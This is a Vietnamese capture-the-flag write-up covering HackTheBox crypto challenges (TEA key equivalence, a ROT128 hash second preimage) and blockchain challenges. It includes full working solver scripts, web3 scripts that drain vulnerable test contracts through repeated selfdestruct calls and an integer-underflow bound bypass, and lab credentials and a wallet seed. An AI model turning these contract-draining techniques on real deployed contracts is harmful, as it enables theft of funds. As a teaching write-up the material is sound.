K1 = k0 + k1 + xor(k2, h) + xor(k3, h)
K2 = xor(k0, h) + xor(k1, h) + k2 + k3
K3 = xor(k0, h) + xor(k1, h) + xor(k2, h) + xor(k3, h)

Tới đây thì done, mình đã có các key rồi, giờ đem đi thử nghiệm thôi:
pt = '712ebc63b7ee138ddf8e2405309c38448b310e6d'
key = b'1' * 16
ct = 'ac442644f6e843e4382da8864248e85751ef723cc9a14d34'
pt, ct = bytes.fromhex(pt), bytes.fromhex(ct)
IV = b'\r\xdd\xd2w<\xf4\xb9\x08'

def keys(key):
    h = 0x80000000
    h = l2b(h)

    k = [key[i:i+4] for i in range(0, 16, 4)]
    K0 = k[0] + k[1] + k[2] + k[3]
    K1 = k[0] + k[1] + xor(k[2], h) + xor(k[3], h)
    K2 = xor(k[0], h) + xor(k[1], h) + k[2] + k[3]
    K3 = xor(k[0], h) + xor(k[1], h) + xor(k[2], h) + xor(k[3], h)
    return [K0, K1, K2, K3]


for key in keys(key):
    cipher = Cipher(key, IV)
    test = cipher.encrypt(pt)
    print(test == ct)

Gotcha, giờ mình sẽ viết full code cho bài:
from pwn import *
from source import Cipher
from Crypto.Util.number import *

def keys(key: bytes):
    h = 0x80000000
    h = long_to_bytes(h)

    k = [key[i:i+4] for i in range(0, 16, 4)]
    K0 = k[0] + k[1] + k[2] + k[3]
    K1 = k[0] + k[1] + xor(k[2], h) + xor(k[3], h)
    K2 = xor(k[0], h) + xor(k[1], h) + k[2] + k[3]
    K3 = xor(k[0], h) + xor(k[1], h) + xor(k[2], h) + xor(k[3], h)
    return [K0, K1, K2, K3]

HOST = '83.136.254.199'
PORT = 36738
IV = b'\r\xdd\xd2w<\xf4\xb9\x08'

r = remote(HOST, PORT)
r.recvuntil(b': ')
sm = r.recvuntil(b'\n').split(b'\n')[0].decode()

for round in range(10):
    key = (str(round) * 16).encode()
    ct = Cipher(key=key, iv=IV).encrypt(bytes.fromhex(sm))
    r.sendlineafter(b' (in hex) : ', bytes.hex(ct).encode())
    temp = keys(key)
    for k in temp: 
        r.sendlineafter(b'(in hex) : ', bytes.hex(k).encode())
    print(f'Finish round number: {round + 1} !!!')
    if round == 9:
        print(r.recv().decode())

Flag
HTB{th1s_4tt4ck_m4k3s_T34_1n4ppr0pr14t3_f0r_h4sh1ng!}
ROT128
credit: Zupp
Description

Source:

import random, os, signal
from Crypto.Util.number import long_to_bytes as l2b, bytes_to_long as b2l
from secret import FLAG

ROUNDS = 3
USED_STATES = []
_ROL_ = lambda x, i : ((x << i) | (x >> (N-i))) & (2**N - 1)
N = 128

def handler(signum, frame):
    print("\n\nToo slow, don't try to do sneaky things.")
    exit()

def validate_state(state):
    if not all(0 < s < 2**N-1 for s in user_state[-2:]) or not all(0 <= s < N for s in user_state[:4]):
        print('Please, make sure your input satisfies the upper and lower bounds.')
        return False

    if sorted(state[:4]) in USED_STATES:
        print('You cannot reuse the same state')
        return False

    if sum(user_state[:4]) < 2:
        print('We have to deal with some edge cases...')
        return False

    return True

class HashRoll:
    def __init__(self):
        self.reset_state()

    def hash_step(self, i):
        r1, r2 = self.state[2*i], self.state[2*i+1]
        return _ROL_(self.state[-2], r1) ^ _ROL_(self.state[-1], r2)

    def update_state(self, state=None):
        if not state:
            self.state = [0] * 6
            self.state[:4] = [random.randint(0, N) for _ in range(4)]
            self.state[-2:] = [random.randint(0, 2**N) for _ in range(2)]
        else:
            self.state = state

    def reset_state(self):
        self.update_state()

    def digest(self, buffer):
        buffer = int.from_bytes(buffer, byteorder='big')
        m1 = buffer >> N
        m2 = buffer & (2**N - 1)
        self.h = b''
        for i in range(2):
            self.h += int.to_bytes(self.hash_step(i) ^ (m1 if not i else m2), length=N//8, byteorder='big')
        return self.h


print('Can you test my hash function for second preimage resistance? You get to select the state and I get to choose the message ... Good luck!')

hashfunc = HashRoll()

for _ in range(ROUNDS):
    print(f'ROUND {_+1}/{ROUNDS}!')

    server_msg = os.urandom(32)
    hashfunc.reset_state()
    server_hash = hashfunc.digest(server_msg)
    print(f'You know H({server_msg.hex()}) = {server_hash.hex()}')

    signal.signal(signal.SIGALRM, handler)
    signal.alarm(2)

    user_state = input('Send your hash function state (format: a,b,c,d,e,f) :: ').split(',')

    try:
        user_state = list(map(int, user_state))

        if not validate_state(user_state):
            print("The state is not valid! Try again.")
            exit()

        hashfunc.update_state(user_state)

        if hashfunc.digest(server_msg) == server_hash:
            print(f'Moving on to the next round!')
            USED_STATES.append(sorted(user_state[:4]))
        else:
            print('Not today.')
            exit()
    except:
        print("The hash function's state must be all integers.")
        exit()
    finally:
       signal.alarm(0)

print(f'Uhm... how did you do that? I thought I had cryptanalyzed it enough ... {FLAG}')

Solution
Bài này là bài lỏ nhất mình từng làm, một là vì có cả unintended solution, hai là bài này hơi quá khó để mình giải và thực sự học được gì đó. Tuy nhiên mình sẽ cố để hấp thụ tinh hoa trong bài toán này.
Trước hết, file source gợi ý cho mình về ý tưởng khai thác second preimage resistance của hàm băm tự chế HashRoll(). Chúng ta sẽ cần break 3 lần liên tiếp để server nhả flag. Về công việc trong mỗi vòng, mình có thể tóm tắt lại như sau:

Server đẻ ra một server_msg với 32 bytes, sau đó trả ra cho chúng ta một hàm băm của server_msg gọi là server_hash = H(server_msg)

Trong 2s, chúng ta sẽ cần nhập vào các user_state hợp lệ, sau đó server sẽ thử băm user_state ra, nếu H(user_state) = server_hash thì chuyển tới vòng tiếp theo.
  Như vậy, công việc chính của mỗi vòng là tìm user_state, tạm gọi là S' sao cho H(S') = H(S), với S là server_msg. Trong đó, S' (cũng như S) gồm có các thành phần a, b, c, d là số bits để ROL - left rotate (dịch vòng trái) và e, f là hai số 128 bits sắp ROLed. Tuy nhiên, có hai điều cần phải lưu ý, S' cần phải hợp lệ, tức là:

Không được reuse lại S'

Tổng a + b + c + d không được nhỏ hơn 2 (tránh vài trường hợp đặc biệt)

a, b, c, d phải nằm trong nửa đoạn [0, 128), e và f phải nằm trong khoảng (0, 2^128 - 1)




    Tất cả mọi thứ đều được phân tích xong, đã biết được chúng ta cần gửi lên server bộ số (a, b, c, d, e, f) sao cho
H(S') = H(S)
<=> h1' + h2' = ROL(e, a) ^ ROL(f, b) ^ m1 + ROL(e, c) ^ ROL(f, d) ^ m2 = h1 + h2

Giờ mình sẽ đi tới cách attack, theo cả unintended và intended solution.
Unintended solution

Unintended solution này xảy ra vì chúng ta có thể dùng z3 để giải. Khi đề bài cho mình server_msg (S) và server_hash (H(S))cũng đồng nghĩa với việc chúng ta có được các giá trị h1, h2 (từ H(S)) và m1, m2 (từ S). Về chi tiết mình sẽ không đi quá sâu mà chỉ gợi ý tìm bằng cách khai thác buffer vì buffer = l2b(S). Từ đây, chắc chắn một điều ta có thể giải ra bộ số (a, b, c, d, e, f) thỏa mãn h1' + h2' = h1 + h2 như trên bằng z3. Đóng gói bộ số này gửi lên server là xong:

from z3 import *
from pwn import *
import re

HOST = 
PORT = 

def find_hex_strings(text):
    pattern = r'\b[a-fA-F0-9]{64}\b'
    hex_strings = re.findall(pattern, text)
    return hex_strings
while True:
    try:
        r = remote(HOST, PORT)

        for i in range(3):
            data = r.recvuntil(b"Send your hash function state (format: a,b,c,d,e,f) ::").decode()

            data = find_hex_strings(data)
            buffer = int(data[0], 16)
            h = data[1]

            N = 128
            _ROL_ = lambda x, i: ((x << i) | (x >> (N-i))) & (2**N - 1)

            m1 = buffer >> N
            m2 = buffer & (2**N - 1)

            h1 = int(h[:32], 16) ^ m1 
            h2 = int(h[32:], 16) ^ m2

            solver = Solver()

            # Declare e and f as 128 bit BitVecs
            e, f = BitVecs('e f', N)

            def constraint_ROL_xor(e, f, i1, i2, h):
                return _ROL_(e, i1) ^ _ROL_(f, i2) == h


            a, b, c, d = BitVecs('a b c d', 7)
            a,b,c,d = ZeroExt(128-7, a), ZeroExt(128-7, b), ZeroExt(128-7, c), ZeroExt(128-7, d)

            solver.add(constraint_ROL_xor(e, f, a, b, h1))
            solver.add(constraint_ROL_xor(e, f, c, d, h2))

            if solver.check() == sat:
                m = solver.model()
                print(m)
                dict = {d.name(): m[d] for d in m.decls()}
                res = f"{dict['a']},{dict['b']},{dict['c']},{dict['d']},{dict['e']},{dict['f']}"
                r.sendline(res.encode())
                r.recvline()
                print(r.recvline())

    except:
        pass

(Shout-out anh lilthawg vì bộ code lỏ này 🔥)
Tuy nhiên không nên vứt máy một chỗ rùi chạy code vì code brute vô hạn không ngừng có lúc đúng có lúc sai và sẽ có một lúc nào đó mọi người không ngờ mà flag lòi ra đâu 🐧
Intended solution

Về intended solution của bài này thì dài kinh khủng khiếp (vì là Insane mà). Tuy nhiên, có thể thu nhỏ vấn đề lại về bài viết này
Nếu đọc bài viết trên, ta có thể hình thành hoàn toàn lời giải cho bài này, tuy nhiên mình cần làm rõ một vài vấn đề:
Ta đã biết phép xor chính là phép cộng trong trường Fp với p = 2, vậy còn phép dịch trái thì sao. Dịch trái 1 bit tương ứng với việc nhân số đó với 2^1, 2 bits là nhân với 2^2, tổng quát lại, dịch k bits là nhân với 2^k.
Tuy nhiên, nếu phần tử A của ta là đa thức, khi đó, ta gọi trường hữu hạn Fp trên là một vành đa thức (polynomial rings) Fp[z] thỏa mãn A là một tổ hợp tuyến tính của a[i] * z^i, a[i] là phần tử của Fp. Trong bài này, trường nghiên cứu là GF(2^128)
Vậy kiến thức này liên quan đến gì tới bài, thực ra nhiều là đằng khác. Xét cách biểu diễn đa thức của một số trong trường GF(2^k) - là trường Galois đã gặp trong mã hóa AES với k = 3, ta có GF(2^3) và trường này có 8 phần tử phân biệt từ 0 đến 7, cụ thể như sau:





Số Biểu diễn nhị phân Biểu diễn đa thức



0 000 0x^2 + 0x^1 + 0x^0 = 0

1 001 0x^2 + 0x^1 + 1x^0 = 1

2 010 0x^2 + 1x^1 + 0x^0 = x

3 011 0x^2 + 1x^1 + 1x^0 = x + 1

4 100 1x^2 + 0x^1 + 0x^0 = x^2

5 101 1x^2 + 0x^1 + 1x^0 = x^2 + 1

6 110 1x^2 + 1x^1 + 0x^0 = x^2 + x

7 111 1x^2 + 1x^1 + 1x^0 = x^2 + x + 1



Nói cách khác, các phần tử trong trường GF(2^8) được biểu diễn dưới dạng trên (cột 3). Nếu ta xor hai phần tử với nhau, giả sử 7 xor 3 sẽ nhận được kết quả là x^2, vì:

7 xor 3
= 7 + 3 (mod 2)
= (x^2 + x + 1) + (x + 1) (mod 2)
= x^2 + 2x + 2 (mod 2)
= x^2 (mod 2)

Đối với bài, trường chúng ta làm việc sẽ là GF(2^128) và chứa 128 phần tử từ 0 đến 127. Khi đó, nếu tính h1' và h2' như bài, ta sẽ thực hiện:
h1' = ROL(e, a) ^ ROL(f, b) ^ m1
h2' = ROL(e, c) ^ ROL(f, d) ^ m2

<=> h1' ^ m1 = ROL(e, a) ^ ROL(f, b)
    h2' ^ m2 = ROL(e, c) ^ ROL(f, d)
- Nếu chọn a = c, khi đó:
h1' ^ m1 = ROL(e, a) + 2**b * f
h2' ^ m2 = ROL(e, a) + 2**d * f (theo như lí thuyết ở trên)

=> h1' ^ m1 ^ h2' ^ m2 = 2**b * f ^ 2**d * f
=> h1' ^ m1 ^ h2' ^ m2 = (2**b ^ 2**d)f
=> f = (h1' ^ m1 ^ h2' ^ m2) / (2**b ^ 2**d)
=> f = (h1 ^ h2 ^ m1 ^ m2) / (2**b ^ 2**d)
+ Đến đây chỉ cần check factor như bài viết trong link là được

- Ta có ROL(e, a) = 2**a * e
=> 2**a = ROL(e, a) / e
=> a = log2(ROL(e, a) / e)
+ Đến đây cũng check factor như bài viết trong link

- Lại có e = ROL(e, a) / (2**a)
=> e = (h1' ^ m1 - ROL(f, b)) / (2**a)
=> e = (h1 ^ m1 - ROL(f, b)) / (2**a)

Vậy chúng ta đã có đầy đủ bộ số (e, f) dựa vào (a, b, c, d) và (h1, h2, m1, m2) thỏa mãn yêu cầu đề bài, vậy attack thôi.
Code:
from pwn import process
from Crypto.Util.number import long_to_bytes as l2b, bytes_to_long as b2l
import itertools, math
from sage.all import *

N = 128
F = GF(2**N, 'w')
w = F.gen()
PR = PolynomialRing(GF(2), 'z')
z = PR.gen()
_ROL_ = lambda x, i : ((x << i) | (x >> (N-i))) & (2**N - 1)

def int2pre(i):
    coeffs = list(map(int, bin(i)[2:].zfill(N)))[::-1]
    return PR(coeffs)

def pre2int(p):
    coeffs = p.coefficients(sparse=False)
    return sum(2**i * int(coeffs[i]) for i in range(len(coeffs)))

def pre2int(p):
    coeffs = p.coefficients(sparse=False)
    return sum(2**i * int(coeffs[i]) for i in range(len(coeffs)))

def get_all_bd():
    powers = '0123456789'
    cands = itertools.product(powers, repeat=2)
    bd = {}
    for cand in set(cands):
        b = int(cand[0])
        d = int(cand[1])
        s = 2**b + 2**d
        bd[s] = sorted([b, d])
    return bd

def get_b_and_d(H, bd, visited):
    factors = sorted([F(i**j).integer_representation() for i,j in list(H.factor())])
    for fact in factors:
        if fact in visited: continue
        if fact in bd:
            b, d = bd[fact]
            visited.append(fact)
            return (b, d)

def get_a_and_c(numer):
    numer_factors = sorted([F(i**j).integer_representation() for i,j in list(numer.factor())])
    cands = []
    for factor in numer_factors:
        a = int(math.log2(factor))
        if 2**a == factor:
            c = a
            cands.append((a, c))
    return cands

def solve(io, bd, used_states, visited):
    io.recvuntil(b'H(')
    server_msg = int(io.recv(64), 16)
    io.recvuntil(b' = ')
    server_hash = l2b(int(io.recvline().strip().decode(), 16))

    m1, m2 = server_msg >> N, server_msg & (2**N - 1)
    H1, H2 = b2l(server_hash[:16]) ^ m1, b2l(server_hash[16:]) ^ m2

    H = int2pre(H1) + int2pre(H2)
    if not H: return None

    bd = get_b_and_d(H, bd, visited)
    if not bd: return None
    b, d = bd
    assert H.mod(int2pre(2**b + 2**d)) == 0

    f = H / int2pre(2**b + 2**d)
    numer = int2pre(H1) - f * int2pre(2**b)
    ac = get_a_and_c(numer)
    if not ac: return None
    for (a, c) in ac:
        e = numer / int2pre(2**a)
        e = pre2int(PR(e))
        f = pre2int(PR(f))
        if sorted([a, b, c, d]) in used_states: continue
        if H1 == _ROL_(e, a) ^ _ROL_(f, b) and H2 == _ROL_(e, c) ^ _ROL_(f, d):
            used_states.append(sorted([a, b, c, d]))
            state = a, b, c, d, e, f
            return state

bd = get_all_bd()
while True:
    used_states = []
    visited = []
    done = 0
    io = process(['python3', 'server.py'])
    for _ in range(3):
        state = solve(io, bd, used_states, visited)
        if state:
            a, b, c, d, e, f = state
            io.sendlineafter(b' :: ', f'{a},{b},{c},{d},{e},{f}'.encode())
            done += 1
            print(f'Finish round number {done} !!!')

            if done == 3:
                io.recvline()
                print(io.recvline().decode())
                exit()
        else:
            print('Try again!!!')
            io.close()
            break

(Code hơi dài và khó viết nên quả thật bài này Insane cũng đáng)

Cách attack cũng chỉ vậy thôi, tuy nhiên lại nằm ở việc khai thác ROL, GF(2**128) và việc tìm collision cho hàm băm nên bài này thực sự rất hay, xứng đáng 💯

Flag
HTB{k33p_r0t4t1ng_4nd_r0t4t1ng_4nd_x0r1ng_4nd_r0t4t1ng!}

BlockChain
Introduction
Trước hết thì với mình, mảng Blockchain này hoàn toàn mới và có rất nhiều thứ mình cần học. Tuy nhiên trong quá trình tham gia giải thì mình được mọi người support khá nhiều, shout-out anh Mạnh AT18, anh lilthawg29 với ông bạn lỏ Thụy AT20. Về flow của các challs dưới đây thì có thể mình chưa thể nắm hết được nhưng mình sẽ cố gắng trình bày chính xác nhất có thể, thanks for reading ❤️
Russian Roulette
Description

Setup.sol:

pragma solidity 0.8.23;

import {RussianRoulette} from "./RussianRoulette.sol";

contract Setup {
    RussianRoulette public immutable TARGET;

    constructor() payable {
        TARGET = new RussianRoulette{value: 10 ether}();
    }

    function isSolved() public view returns (bool) {
        return address(TARGET).balance == 0;
    }
}


RussianRoulette.sol:

pragma solidity 0.8.23;

contract RussianRoulette {

    constructor() payable {
        // i need more bullets
    }

    function pullTrigger() public returns (string memory) {
        if (uint256(blockhash(block.number - 1)) % 10 == 7) {
            selfdestruct(payable(msg.sender)); // 💀
        } else {
        return "im SAFU ... for now";
        }
    }
}

Solution
Bài này thì có hai file, file Setup.sol sẽ được thực thi chính, và flow của chương trình sẽ như sau (cũng có thể hỏi ChatGPT nếu stuck):

Khai báo một contract tên Setup

Khai báo một biến TARGET (biến immutable, tạm hiểu là không thể thay đổi, giống với chức năng của biến constant ). Bên cạnh đó TARGET thuộc kiểu RussianRoulette (đã import từ file RussianRoulette.sol)

Khai báo một hàm khởi tạo, trong hàm này gán TARGET bằng địa chỉ của RussianRoulette và 10 Ether khởi tạo

Khai báo hàm isSolved(), dùng để kiểm tra số dư của TARGET, nếu bằng 0 thì trả về True


Mình sẽ đi sâu một chút vào phân tích file RussianRoulette.sol:

Khai báo hàm khởi tạo (nhưng chả có gì ngoài dòng comment cho vui 🐒)

Khai báo hàm pullTrigger(), hàm này chúng ta có thể call được. Hàm này sẽ check nếu hash của block trước mod 10 bằng 7 thì tự hủy luôn (selfdestruct), thực ra là nó sẽ gửi tất cả tiền về cho mình, nếu không thì in ra dòng im SAFU ... for now (thực ra chẳng SAFU nổi đâu vì mình sắp cho nó đi bán muối rồi 😈 )


Rồi, vậy thì mục tiêu chính của bài là lấy tất cả tiền của thằng TARGET kia rồi mình sẽ nhận được flag. Có một điều mình chưa nói là khi Spawn Docker của bài sẽ có 2 ports cho 1 id. Thực chất 1 port là để connect để lấy thông tin còn 1 port để nc với server (để lấy flag) thôi.
Mình sẽ nói về cách exploit ở đây. Đầu tiên nếu ai chưa tiếp xúc với solidity bao giờ, nói chung là smart contract đi, thì sẽ rất khó để hiểu code và viết nó ra sao. Mình cũng thế và toàn bộ code là do ChatGPT viết, cái chính ở đây sẽ là idea để khai thác. Hàm duy nhất mình có thể attack ở đây là pullTrigger() vì mình tương tác với nó mà, bên cạnh đó hàm cũng là cách duy nhất để thó sạch tiền của thằng cu TARGET kia. Hàm này kiểm tra hash của block trước, nhưng bố ai biết được block trước như nào 🐧, vậy nên khá may rủi. Tuy nhiên, hàm không giới hạn lần gọi, nên mình sẽ gọi nhiều lần pullTrigger() cho đến khi thó được tiền thì thôi. Idea đơn giản như thế nhưng code gần trăm dòng chứ ít 🐧
Full script:
import eth_account
from web3 import Web3

w3 = Web3(Web3.HTTPProvider('http://94.237.53.81:39438'))

Private_key = '0xe1fc19baee3e2ec693eb28626a41d1f0fa297b2481b66e0b7bcad143bb4ffa38'
Address = '0xAe0CEeDB8238725A8BdCCeF55161d06Fb1e111F0'
Target_contract = '0x251478952cDF5819e5C901db75a1E12B65Af3122'
Setup_contract = '0x1176a5a7413241ECA579B5d38290b8fe31e24FE9'

my_account = eth_account.Account.from_key(Private_key)

SETUP_CONTRACT_ABI = [
    {
        "inputs": [],
        "stateMutability": "nonpayable",
        "type": "constructor"
    },
    {
        "inputs": [],
        "name": "TARGET",
        "outputs": [
            {
                "internalType": "contract RussianRoulette",
                "name": "",
                "type": "address"
            }
        ],
        "stateMutability": "view",
        "type": "function"
    },
    {
        "inputs": [],
        "name": "isSolved",
        "outputs": [
            {
                "internalType": "bool",
                "name": "",
                "type": "bool"
            }
        ],
        "stateMutability": "view",
        "type": "function"
    }
]

TARGET_CONTRACT_ABI = [
    {
        "inputs": [],
        "stateMutability": "payable",
        "type": "constructor"
    },
    {
        "inputs": [],
        "name": "pullTrigger",
        "outputs": [
            {
                "internalType": "string",
                "name": "",
                "type": "string"
            }
        ],
        "stateMutability": "payable",
        "type": "function"
    }
]

Setup_contract = w3.eth.contract(address=Setup_contract, abi=SETUP_CONTRACT_ABI)
Target_contract = w3.eth.contract(address=Target_contract, abi=TARGET_CONTRACT_ABI)

while True:
    is_solved = Setup_contract.functions.isSolved().call()
    if is_solved:
        print("Target contract is already solved!")
        break
    tx = Target_contract.functions.pullTrigger().build_transaction({
        'gas': 200000,
        'gasPrice': w3.to_wei('5', 'gwei'),
        'nonce': w3.eth.get_transaction_count(Address),
    })
    signed_tx = w3.eth.account.sign_transaction(tx, Private_key)
    tx_hash = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
    print("Transaction sent:", tx_hash.hex())

(để chạy được code này thì cần spawn docker, lấy ip server, lấy info, cài đặt thư viện web3, nói chung là nhiều lắm nên cách này cũng hơi lỏ 🐒)
Sau khi thó tiền thì quay lại port 2 kia để lấy flag. Done 💰



Flag
HTB{99%_0f_g4mbl3rs_quit_b4_bigwin}
Note
Bên cạnh đó, mình có thể sử dụng một tool lỏ có tên là Foundry nhưng tạm thời mình chưa tìm hiểu kĩ nên thôi 🐒
Lucky Faucet
Description

Setup.sol:

// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.7.6;

import {LuckyFaucet} from "./LuckyFaucet.sol";

contract Setup {
    LuckyFaucet public immutable TARGET;

    uint256 constant INITIAL_BALANCE = 500 ether;

    constructor() payable {
        TARGET = new LuckyFaucet{value: INITIAL_BALANCE}();
    }

    function isSolved() public view returns (bool) {
        return address(TARGET).balance <= INITIAL_BALANCE - 10 ether;
    }
}


LuckyFaucet:

// SPDX-License-Identifier: MIT
pragma solidity 0.7.6;

contract LuckyFaucet {
    int64 public upperBound;
    int64 public lowerBound;

    constructor() payable {
        // start with 50M-100M wei Range until player changes it
        upperBound = 100_000_000;
        lowerBound =  50_000_000;
    }

    function setBounds(int64 _newLowerBound, int64 _newUpperBound) public {
        require(_newUpperBound <= 100_000_000, "100M wei is the max upperBound sry");
        require(_newLowerBound <=  50_000_000,  "50M wei is the max lowerBound sry");
        require(_newLowerBound <= _newUpperBound);
        // why? because if you don't need this much, pls lower the upper bound :)
        // we don't have infinite money glitch.
        upperBound = _newUpperBound;
        lowerBound = _newLowerBound;
    }

    function sendRandomETH() public returns (bool, uint64) {
        int256 randomInt = int256(blockhash(block.number - 1)); // "but it's not actually random 🤓"
        // we can safely cast to uint64 since we'll never 
        // have to worry about sending more than 2**64 - 1 wei 
        uint64 amountToSend = uint64(randomInt % (upperBound - lowerBound + 1) + lowerBound); 
        bool sent = msg.sender.send(amountToSend);
        return (sent, amountToSend);
    }
}

Solution

Sau khi trải nghiệm một bài blockchain đơn giản thì mình bị quẳng ngay một bài lỏ. Mình sẽ chỉ giải thích điều kiện để lấy được flag, phân tích những gì mình có và cách exploit thui.

Trước tiên đọc file Setup.sol biết được:

TARGET của mình có 500 Ether khởi tạo

Lấy được flag khi tiền của TARGET bị hụt đi 10 Ether



Còn với file LuckyFaucet:

Khai báo hai mức Bound, một là max một là min

Khai báo một hàm setBounds() cho phép mình thay đổi Bound

Khai báo hàm sendRandomETH(). Hàm này như một cái vòi nước từ túi của TARGET, dùng để gửi tiền cho mình nhưng là tiền trong giới hạn Bound thôi.



Qua phân tích trên, cộng với việc hàm setBounds() là hàm mình có thể call vào, thì chắc chắn lỗ hổng nằm ở đây. Mình cần lấy đi Ether từ TARGET, mà tiền của TARGET phụ thuộc vào Bound do mình set, vậy nên đây là hướng đi.

Tất nhiên, câu hỏi sẽ là Bound như nào mới bypass, vậy mình cần phân tích lượng tiền mà nó gửi:


uint64 amountToSend = uint64(randomInt % (upperBound - lowerBound + 1) + lowerBound)


Mình cần làm sao cho lượng amountToSend càng lớn càng tốt. Bên cạnh đó, trong Solidity, nếu mình khai báo một số k < 0 ở dạng uint64, số trả về sẽ cực lớn, cụ thể là uint64(k) = 2**64 + k. Sure về hướng exploit rồi, giờ thì tới code thôi:

import eth_account
from web3 import Web3

RPC = ''
private_key = ''
address = ''
target_contract_address = ''

w3 = Web3(Web3.HTTPProvider(RPC))

target_contract_abi = [
    {
        "inputs": [],
        "stateMutability": "payable",
        "type": "constructor"
    },
    {
        "inputs": [],
        "name": "upperBound",
        "outputs": [{"internalType": "int64", "name": "", "type": "int64"}],
        "stateMutability": "view",
        "type": "function"
    },
    {
        "inputs": [],
        "name": "lowerBound",
        "outputs": [{"internalType": "int64", "name": "", "type": "int64"}],
        "stateMutability": "view",
        "type": "function"
    },
    {
        "inputs": [],
        "name": "sendRandomETH",
        "outputs": [{"internalType": "bool", "name": "", "type": "bool"}, {"internalType": "uint64", "name": "", "type": "uint64"}],
        "stateMutability": "nonpayable",
        "type": "function"
    },
    {
        "inputs": [{"internalType": "int64", "name": "_newLowerBound", "type": "int64"}, {"internalType": "int64", "name": "_newUpperBound", "type": "int64"}],
        "name": "setBounds",
        "outputs": [],
        "stateMutability": "nonpayable",
        "type": "function"
    }
]

my_account = eth_account.Account.from_key(private_key)
w3.eth.default_account = my_account.address
target_contract = w3.eth.contract(address=target_contract_address, abi=target_contract_abi)
target_contract.functions.setBounds(-10000000000000000, 100000000).transact()

tx_hash = target_contract.functions.sendRandomETH().transact()
tx_receipt = w3.eth.wait_for_transaction_receipt(tx_hash)
print("Transaction successful")

if w3.eth.get_balance(my_account.address) >= 10 * 10**18:
    print("Exploited successfully!")
else:
    print("Set bounds again!")

(Nhớ thay thế các giá trị vào nha ❤️)

Flag
HTB{1_f0rg0r_s0m3_U}
Note

Cần lưu ý tiền chỉ gửi một lần nên không thể set vòng lặp như bài trước đâu 💸:

10 Ether tương đương với 10 * 10**18 wei và tiền giao dịch theo đơn vị wei nên có phép so sánh ở dòng 56 kia 💰.


Recovery
Description

We are The Profits. During a hacking battle our infrastructure was compromised as were the private keys to our Bitcoin wallet that we kept.

We managed to track the hacker and were able to get some SSH credentials into one of his personal cloud instances, can you try to recover my Bitcoins?

Username: satoshi

Password: L4mb0Pr0j3ct

NOTE: Network is regtest, check connection info in the handler first.


Solution
Đây là chall duy nhất trong Blockchain không cho một file gì 🐧, bên cạnh đó còn cho 1 IP nhưng với 3 Ports, siêu lỏ.
Mình sẽ phân tích 3 Ports và cách dùng:

Port 1: Vác vào SSH để lấy seed - sử dụng để recover lại ví (Dùng với Electrum)

Port 2: Dùng để tạo một network loại regtest - dùng cho thí nghiệm và không ảnh hưởng đến các lưu thông tiền ảo bên ngoài.

Port 3: Tương tác với server và lấy flag - dùng nc


Mình sẽ tổng hợp các bước và thông tin ở dưới đây (theo thời điểm làm bài của mình vì Docker mỗi người một khác):
IP: 94.237.50.175

PORT 1: 41769
ssh satoshi@94.237.50.175 -p 41769
L4mb0Pr0j3ct
--------------------------------------------------
PORT 2: 31819
& "E:\Electrum\electrum-4.5.3.exe" --regtest --oneserver -s 94.237.50.175:31819:t
--------------------------------------------------
PORT 3: 37501
nc 94.237.50.175 37501


Các bước:
  
  --> Seed: fortune bubble wealth all sure sun awful agree energy possible margin green
  

Nhập vài thông tin linh tinh, chọn Standard wallet rồi I already have a seed
  

Nhảy ra như thế này là oke
  

Chúng ta sẽ quay sang nc để lấy thông tin người cần gửi
  

Tới đây lấy thông tài tài khoản đích:
  --> Address: bcrt1qs7qqy5573cqqd6d3uj7htn2x02hqrk3yde3ygr

Quay lại Electrum và giao dịch
  
  
  

Rồi back lại server lấy flag là xong
  


Flag
HTB{n0t_y0ur_k3ys_n0t_y0ur_c01n5}
Note
Bài này mình được Thụy AT20 support, sau khi làm thì thấy chall chả khác 🐶 gì Forensics very easy cả 🐧
Ledger Heist
Description
Amidst the dystopian chaos, the LoanPool stands as a beacon for the oppressed, allowing the brave to deposit tokens in support of the cause. Your mission, should you choose to accept it, is to exploit the system's vulnerabilities and siphon tokens from this pool, a daring act of digital subterfuge aimed at weakening the regime's economic stronghold. Success means redistributing wealth back to the people, a crucial step towards undermining the oppressors' grip on power.

Errors.sol:

// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;

error NotSupported(address token);
error CallbackFailed();
error LoanNotRepaid();
error InsufficientBalance();


Events.sol:

// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;

interface Events {
    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(address indexed owner, address indexed spender, uint256 value);
    event FlashLoanSuccessful(
        address indexed target, address indexed initiator, address indexed token, uint256 amount, uint256 fee
    );
    event FeesUpdated(address indexed token, address indexed user, uint256 fees);
}


FixedPointMath.sol:

// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;

library FixedMathLib {
    function fixedMulFloor(uint256 self, uint256 b, uint256 denominator) internal pure returns (uint256) {
        return self * b / denominator;
    }

    function fixedMulCeil(uint256 self, uint256 b, uint256 denominator) internal pure returns (uint256 result) {
        uint256 _mul = self * b;
        if (_mul % denominator == 0) {
            result = _mul / denominator;
        } else {
            result = _mul / denominator + 1;
        }
    }

    function fixedDivFloor(uint256 self, uint256 b, uint256 denominator) internal pure returns (uint256) {
        return self * denominator / b;
    }

    function fixedDivCeil(uint256 self, uint256 b, uint256 denominator) internal pure returns (uint256 result) {
        uint256 _mul = self * denominator;
        if (_mul % b == 0) {
            result = _mul / b;
        } else {
            result = _mul / b + 1;
        }
    }
}


Interfaces.sol:

// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;

interface IERC20Minimal {
    function transfer(address to, uint256 amount) external returns (bool);
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
    function balanceOf(address account) external view returns (uint256);
}

interface IERC3156FlashBorrower {
    function onFlashLoan(address initiator, address token, uint256 amount, uint256 fee, bytes calldata data)
        external
        returns (bytes32);
}


LoanPool.sol:

// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;

import {FixedMathLib} from "./FixedPointMath.sol";
import "./Errors.sol";
import {IERC20Minimal, IERC3156FlashBorrower} from "./Interfaces.sol";
import {Events} from "./Events.sol";

struct UserRecord {
    uint256 feePerShare;
    uint256 fees;
    uint256 balance;
}

contract LoanPool is Events {
    using FixedMathLib for uint256;

    uint256 constant BONE = 10 ** 18;

    address public underlying;
    uint256 public totalSupply;
    uint256 public feePerShare;
    mapping(address => UserRecord) public userRecords;

    constructor(address _underlying) {
        underlying = _underlying;
    }

    function deposit(uint256 amount) external {
